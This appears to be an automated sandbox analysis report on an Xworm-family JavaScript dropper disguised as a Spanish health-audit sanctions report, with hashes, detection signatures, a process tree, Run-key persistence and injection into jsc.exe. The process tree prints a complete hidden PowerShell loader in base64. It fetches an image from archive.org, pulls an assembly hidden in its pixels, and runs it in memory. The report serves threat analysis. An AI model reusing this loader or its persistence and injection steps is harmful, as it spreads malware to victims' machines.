Analysis
max time kernel: 136s
max time network: 149s
platform: windows11-21h2_x64
resource: win11-20250619-en
resource tags: arch:x64 arch:x86 image:win11-20250619-en locale:en-us os:windows11-21h2-x64 system
submitted: 02/07/2025, 18:52
Static task: static1
Behavioral task: behavioral1
Sample: NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
Resource: win10v2004-20250610-en
General
Target: NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
Size: 19KB
MD5: 9f6c707c6678a8c0bf0d1fe1412b26a6
SHA1: 3c6425c1a5dbfe0a425ee46cc1a4b9a4f8fb8ed1
SHA256: 0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1
SHA512: c8c469d76efbde71a296f7c59537b58475a6359e823ac6800e5bc0c1b1f6f442b665fd4d0401f55da8cc8426002d686ed7af6046a22ae38f6bbec173c3127b29
SSDEEP: 192:QTV70IM2f2BWAK/Mbk2B6BnLWlxj4eO05VG8IUZYDanl:0V1M2+M+bdYNc7v1IUyDo
Malware Config
Extracted
https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg
https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg
Signatures

Detect Xworm Payload (1 IoC)
| resource | yara_rule |
| --- | --- |
| behavioral2/memory/4552-19-0x0000000000400000-0x000000000040E000-memory.dmp | family_xworm |

Xworm family

Blocklisted process makes network request (6 IoCs)
| flow | pid | Process |
| --- | --- | --- |
| 2 | 5116 | wscript.exe |
| 4 | 1620 | powershell.exe |
| 5 | 1620 | powershell.exe |
| 6 | 1412 | WScript.exe |
| 7 | 1308 | powershell.exe |
| 9 | 1308 | powershell.exe |

Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
Run PowerShell and hide display window.
| pid | Process |
| --- | --- |
| 1620 | powershell.exe |
| 1308 | powershell.exe |

Adds Run key to start application (2 TTPs, 2 IoCs)
| description | ioc | Process |
| --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-625765727-1271952295-745797415-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-625765727-1271952295-745797415-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\Users\\Public\\Downloads\\agnosticism.js" | powershell.exe |

Suspicious use of SetThreadContext (2 IoCs)
| description | pid | Process | procid_target |
| --- | --- | --- | --- |
| PID 1620 set thread context of 4552 | 1620 | powershell.exe | 89 |
| PID 1308 set thread context of 5004 | 1308 | powershell.exe | 93 |

Command and Scripting Interpreter: JavaScript (1 TTP)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

System Location Discovery: System Language Discovery (1 TTP, 2 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
| description | ioc | Process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | jsc.exe |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | jsc.exe |

Modifies registry class (1 IoC)
| description | ioc | Process |
| --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-625765727-1271952295-745797415-1000_Classes\Local Settings | cmd.exe |

Suspicious behavior: EnumeratesProcesses (11 IoCs)
| pid | Process | occurrences |
| --- | --- | --- |
| 1620 | powershell.exe | 9 |
| 1308 | powershell.exe | 2 |

Suspicious use of AdjustPrivilegeToken (4 IoCs)
| description | pid | Process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 1620 | powershell.exe |
| Token: SeDebugPrivilege | 1308 | powershell.exe |
| Token: SeDebugPrivilege | 4552 | jsc.exe |
| Token: SeDebugPrivilege | 5004 | jsc.exe |

Suspicious use of WriteProcessMemory (33 IoCs)
| description | pid | Process | procid_target | occurrences |
| --- | --- | --- | --- | --- |
| PID 5116 wrote to memory of 1620 | 5116 | wscript.exe | 79 | 2 |
| PID 1620 wrote to memory of 4060 | 1620 | powershell.exe | 81 | 2 |
| PID 5016 wrote to memory of 1412 | 5016 | cmd.exe | 86 | 2 |
| PID 1620 wrote to memory of 1428 | 1620 | powershell.exe | 85 | 3 |
| PID 1620 wrote to memory of 956 | 1620 | powershell.exe | 87 | 3 |
| PID 1620 wrote to memory of 4948 | 1620 | powershell.exe | 88 | 3 |
| PID 1620 wrote to memory of 4552 | 1620 | powershell.exe | 89 | 8 |
| PID 1412 wrote to memory of 1308 | 1412 | WScript.exe | 90 | 2 |
| PID 1308 wrote to memory of 5004 | 1308 | powershell.exe | 93 | 8 |
Processes (indentation shows parent/child nesting)

C:\Windows\system32\wscript.exe (PID 5116)
Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1620)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='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';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

        C:\Windows\System32\cmd.exe (PID 4060)
        Command line: "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\agnosticism.js"

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe (PID 1428)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe (PID 956)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe (PID 4948)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe (PID 4552)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\cmd.exe (PID 5016)
Command line: C:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\agnosticism.js
- Modifies registry class
- Suspicious use of WriteProcessMemory

    C:\Windows\System32\WScript.exe (PID 1412)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\agnosticism.js"
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1308)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='JGNydWVsbCA9ICdWa0ZKJzskTWFjb3dhbml0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjcnVlbGwpOyRkaXNlbWJhcmsgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkTWFjb3dhbml0ZXMpOyRzZW1pYnJldmUgPSAnUTJ4aGMzTk1hV0p5WVhKNU1TNUliMjFsJzskcGhvc3Bob3BlcHRpZGUgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRzZW1pYnJldmUpOyR3b29ka25hY2tlciA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRwaG9zcGhvcGVwdGlkZSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskdGVsZW9sb2dpc209J2h0dHBzOi8vYXJjaGl2ZS5vcmcvZG93bmxvYWQvdW5pdmVyc2UtMTczMzM1OTMxNTIwMi04NzUwL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC5qcGcnOyRwb2xvbmlmZXJvdXM9TmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskcG9sb25pZmVyb3VzLkhlYWRlcnMuQWRkKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAnKTskcG94dmlydXM9JHBvbG9uaWZlcm91cy5Eb3dubG9hZERhdGEoJHRlbGVvbG9naXNtKTskcHJlc2NpZW50aWZpYz1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskZHVzdG1lbj0tMTtmb3IoJGRpc3NpbWlsYXI9MDskZGlzc2ltaWxhciAtbGUgJHBveHZpcnVzLkxlbmd0aC0kcHJlc2NpZW50aWZpYy5MZW5ndGg7JGRpc3NpbWlsYXIrKyl7ICRub25tZWF0PSR0cnVlO2ZvcigkbWljcm9icmV3ZWQ9MDskbWljcm9icmV3ZWQgLWx0ICRwcmVzY2llbnRpZmljLkxlbmd0aDskbWljcm9icmV3ZWQrKyl7aWYoJHBveHZpcnVzWyRkaXNzaW1pbGFyKyRtaWNyb2JyZXdlZF0gLW5lICRwcmVzY2llbnRpZmljWyRtaWNyb2JyZXdlZF0peyRub25tZWF0PSRjcmFwbmVsO2JyZWFrfX1pZigkbm9ubWVhdCl7JGR1c3RtZW49JGRpc3NpbWlsYXI7YnJlYWt9fWlmKCRkdXN0bWVuIC1lcSAtMSl7cmV0dXJufTskQXNoZXZpbGxlPSRwb3h2aXJ1c1skZHVzdG1lbi4uKCRwb3h2aXJ1cy5MZW5ndGgtMSldOyRTbmFrZT1OZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbTskU25ha2UuV3JpdGUoJEFzaGV2aWxsZSwwLCRBc2hldmlsbGUuTGVuZ3RoKTskU25ha2UuU2VlaygwLCdCZWdpbicpfE91dC1OdWxsOyRtZXRhZXNjYWxpbmU9W0RyYXdpbmcuQml0bWFwXTo6RnJvbVN0cmVhbSgkU25ha2UpOyRtb2JpbGl0aWVzPU5ldy1PYmplY3QgQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0W0J5dGVdO2ZvcigkcHJhdGlxdWVzPTA7JHByYXRpcXVlcyAtbHQgJG1ldGFlc2NhbGluZS5IZWlnaHQ7JHByYXRpcXVlcysrKXtmb3IoJHNwdXR0ZXJlcj0wOyRzcHV0dGVyZXIgLWx0ICRtZXRhZXNjYWxpbmUuV2lkdGg7JHNwdXR0ZXJlcisrKXskb2xpZ29uZXBocm91cz0kbWV0YWVzY2FsaW5lLkdldFBpeGVsKCRzcHV0dGVyZXIsJHByYXRpcXVlcyk7JG1vYmlsaXRpZXMuQWRkKCRvbGlnb25lcGhyb3VzLlIpOyRtb2JpbGl0aWVzLkFkZCgkb2xpZ29uZXBocm91cy5HKTskbW9iaWxpdGllcy5BZGQoJG9saWdvbmVwaHJvdXMuQil9fTskb3N0ZW90aGVjYT1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkbW9iaWxpdGllcy5HZXRSYW5nZSgwLDQpLlRvQXJyYXkoKSwwKTskQWxpY29ybnM9JG1vYmlsaXRpZXMuR2V0UmFuZ2UoNCwkb3N0ZW90aGVjYSkuVG9BcnJheSgpOyRDYXJsb3ZpbmdpYW49W0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkQWxpY29ybnMpLlJlcGxhY2UoJ0EnLCdAJykuUmVwbGFjZSgnQCcsJ0EnKTskc3F1YWxsZXI9JzBoSGR1SXpZeklETjRNRE14Y1RZNE1qWTJnRE0yUUdOM2dETzFNek5pSkRNMUVUWmY5bWRwVlhjeUYyTH1eOTJZdWMyYnNKMmIwTlhaMjlHYnVRbmNoUjNjczkyYndSV1lsUjJMdm9EYzBSSGEnLlJlcGxhY2UoJ31eJywndCcpOyRiZWRhZz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJENhcmxvdmluZ2lhbik7JG1hbmh1bnRzPVtSZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYmVkYWcpOyRnYW1ibGVkPUAoJHNxdWFsbGVyLCcxJywnQzpcVXNlcnNcUHVibGljXERvd25sb2FkcycsJ2Fnbm9zdGljaXNtJywnanNjJywnJywnJywnJywnJywnJywnJywnanMnLCcnLCcnLCcnLCcyJywnJyk7JG1hbmh1bnRzLkdldFR5cGUoJHdvb2RrbmFja2VyKS5HZXRNZXRob2QoJGRpc2VtYmFyaykuSW52b2tlKCR0YWxsaWFnZSwkZ2FtYmxlZCk7JG1ldGFlc2NhbGluZS5EaXNwb3NlKCk7JFNuYWtlLkRpc3Bvc2UoKQ==';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
        - Blocklisted process makes network request
        - Command and Scripting Interpreter: PowerShell
        - Adds Run key to start application
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

            C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe (PID 5004)
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
            - System Location Discovery: System Language Discovery
            - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v16
Downloads

Filesize: 3KB
MD5: 8db89638d25eb835085ddae51b7df0ff
SHA1: 6b06c8b024f2b5bbcb0ca2323aac080ca2b101dd
SHA256: b76abef376e058bbf246be196a0de223552b11bce715cf65f6073f678164de35
SHA512: 64919bb2796afcd347264233053d7275c8171e544ce02313f21a77d26bdbfc5af0e9ab069cb256d1ce1996019c6fb320a5880bb4556ef0748ef3bf8dd17e05e8

Filesize: 1KB
MD5: 7b5fe43dda2544ecf1948d765ad2a49a
SHA1: b9a52f5a2981e7dcc1046e91fd3f78e216bf9578
SHA256: 5d441b6c6a153bed01c7e976a0f82e67e38f043f8b0296ae56a57024a7441830
SHA512: 8146dc9526ebba7fcd7c8258759a6212cac27fc70afe1ddc712409d1af757cef4d7944aa2856962d8f05c0f569fe9b3e2302d7ca42d6f3f49d085b12ef46a926

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 19KB
MD5: 9b49b1a2e0327767db6dc4883654dd22
SHA1: 486be1d6c5d4f2f6d7b80613aeae32ed3a7a69ba
SHA256: 761b67f0715d7f89c50cdb2dd4a18a49952a21d301907bafbaf0942179afdb30
SHA512: b473926aa77d0827eefeafc7ee8a59989e936ef3c0b7b316b0ab5eb7a34a993c2734419c7a80c8505904dcdb31c672156f33fe6e26084b3d8e8c1b565f6bc206